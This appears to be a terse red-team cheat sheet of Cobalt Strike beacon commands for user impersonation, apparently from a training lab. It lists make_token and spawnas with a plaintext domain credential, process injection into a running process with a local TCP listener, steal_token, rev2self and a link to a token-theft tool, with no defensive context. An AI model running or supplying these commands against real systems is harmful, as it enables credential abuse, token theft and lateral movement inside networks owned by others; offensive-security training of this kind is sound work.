User Impersonation

Make Token

beacon> getuid

beacon> ls \\srv-2\c$

C:\>net helpmsg 5

beacon> make_token DEV\jking Purpl3Drag0n

beacon> rev2self

Process Injection

beacon> ps

beacon> inject 3320 x64 tcp-4444-local
beacon> spawnas DEV\jking Purpl3Drag0n tcp-4444-local

Steal Token

beacon> ls \\srv-2\c$

beacon> steal_token 3320

User Impersonation (Manual)

Source: https://github.com/slyd0g/PrimaryTokenTheft

Last updated